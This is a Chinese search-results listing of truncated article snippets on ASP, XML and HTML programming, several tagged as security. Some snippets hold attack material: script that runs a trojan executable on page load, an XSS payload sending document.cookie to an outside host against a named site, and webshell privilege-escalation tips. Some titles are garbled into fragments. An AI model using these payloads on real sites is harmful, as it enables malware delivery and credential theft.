搜索列表
-
网页打开后自动执行木马
【安全相关】<script language="javascript"> run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\"" run_exe+="CODEBASE=\"muma.exe#version=1,1,1,1\">" //这里的muma.exe就是我们要运行的程序&n...
网页打开后自动执行木马 -
关于动网的cookie泻露站点绝路径的问题
【安全相关】一、跨站测试 先看看我的一次跨站测试吧 我以职业欠钱的站点做测试吧: Host:zhiyeqianqian.51web.cn My Test: 先在他的论谈上传两张图, 图一的内容是: <script>document.location='http://linzi.cnbct.org/cookie.asp?msg='+document.cookie</script> 得到url为UploadFile/2005-6/200562716565...
关于动网的cookie泻露站点绝路径的问题 -
HTML中的数据绑定
【CSS/HTML】信息来源:Wayne_Deng的专栏 有没想过在java script中使用recordset?原来在客户端操作数据也可以这样简单,定义一个数据源,将数据绑定在各种tag上,实现应用程序般的效果,酷毙了!(首先申明一点,文章的内容全部来自msdn,不过用我自己的话总结而已。) 先看看这样两个例子: http://msdn.microsoft.com/works...
HTML中的数据绑定 -
不用模板只用ASP+FSO生成静态HTML页的一个方法
【ASP编程】不用模板,只用ASP+FSO生成静态HTML页的一个方法(对于内容密集型页面特别适用) 转载请注明:转自http://goaler.xicp.net FSO生成静态HTML文件的时候替换模板标签一直是一个很麻烦的问题,至少我是这么认为的,还要别外做一个模板,麻烦!,我今天看见有一个方法可以解决这个问题 如一个正常的index.a...
不用模板只用ASP+FSO生成静态HTML页的一个方法 -
无组件实现文件上传/下载
【ASP编程】' 用ASP实现无组件上传/下载文件 ' ' 功能简介 ' 将上传的文件数据保存到数据库中,可以处理表单中的多个上传文件的情况 ' 适用于各种数据库,使用ADO的方法连接数据库 ' 本示例中使用的是ACCESS数据库:zj.mdb ' 表:tb_img(...
无组件实现文件上传/下载 -
提升(web)权限终极9技巧
【安全相关】当我们取得一个webshell时候,下一部要做的就是提升权限 个人总结如下: 1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆 2....
提升(web)权限终极9技巧 -
Web代理(Asp版)
【ASP编程】asp写Web代理软件,可以用作突破网关限制等,主要是为了配合Ajax使用的(因Firefox存在跨域访问的问题) 版本 0.1 作者 LlinZzi 功能 判断网站编码,支持任何语言 超连接自动转换 附带一个远程下载图片的函数 未解决问题,目前只能用来代理网站代码,图片等其他数据的代理转发尚未完成。复制代码 代码如下:<...
Web代理(Asp版) -
Access中使用Create Procedure创建存储过程第1/2页
【ASP编程】在Access自身的帮助中看到了Create Procedure语句,测试了老半天,终于发现了诀窍:必须使用OleDb连接才能使用Create Procedure语句。ODBC连接不支持该语句,提示Create Table语法错误。 创建了存储过程后,使用Office Access工具打开数据库,在“对象 - 查询”中能够看...
Access中使用CreateProcedure创建存储过程 -
如何在不支持数据库的asp主页上运用ado
【ASP编程】许多人都可能又自己的asp个人主页,但有数据库权限的不会很多,今天我给一个方法。大家可以自己建立一个库。不用access或sql server的格式。是自己建一个格式。(听起来很高深奥!以前开发一个数据库,都是些很厉害的系统分析员奥!今天我们来变通一下!) 就是这个了控件。 tdc:tabular data ...
如何在不支持数据库的asp主页上运用ado -
XMLDOM对象方法:对象事件
【XML/RSS】Ondataavailable 事件 作 用 此事件会在XML 文件有效时被触发。 基本语法 此一事件有下面三种处理方式. Inline:<element ondataavailable = handler>;. Event property:object.ondataavailable = handler;.&n...
|XM|ML|LD|DO|OM|M对|对象|象方|方法|法对|对象|象事|事件|件| -
XML指南——XML 浏览器(Netscape、Explorer)
【XML/RSS】 在我们这个XML指南里,我们把焦点放在Internet Explorer 5.0及其以后的版本上。 Web站点上的XML 许多应用程序都支持XML。我们主要研究Internet Explorer 5.X+ 对此有些人可能会抱怨,但是我们只想把事情简单化,在网络环境中这时我们所知道的唯一一个真实测试XML例子的...
|XM|ML|L指|指南|南—|——|—X|XM|ML|L浏|浏览|览器|器(|(N|Ne|et|ts|sc|ca|ap|pe|e、|、E|Ex|xp|pl|l -
XML简介
【XML/RSS】所谓的xml,就是eXtensible Markup Language, 翻译成中文就是“可扩展标识语言“,在国内很多人理解xml为html的简单扩展,这实际上是一种误解。尽管xml同html关系非常密切。 XML与SGML、HTML的关系。 SGML、HTML是XML的先驱。SGML是指“通用标识语言标准”(Sta...
|XM|ML|L简|简介|介|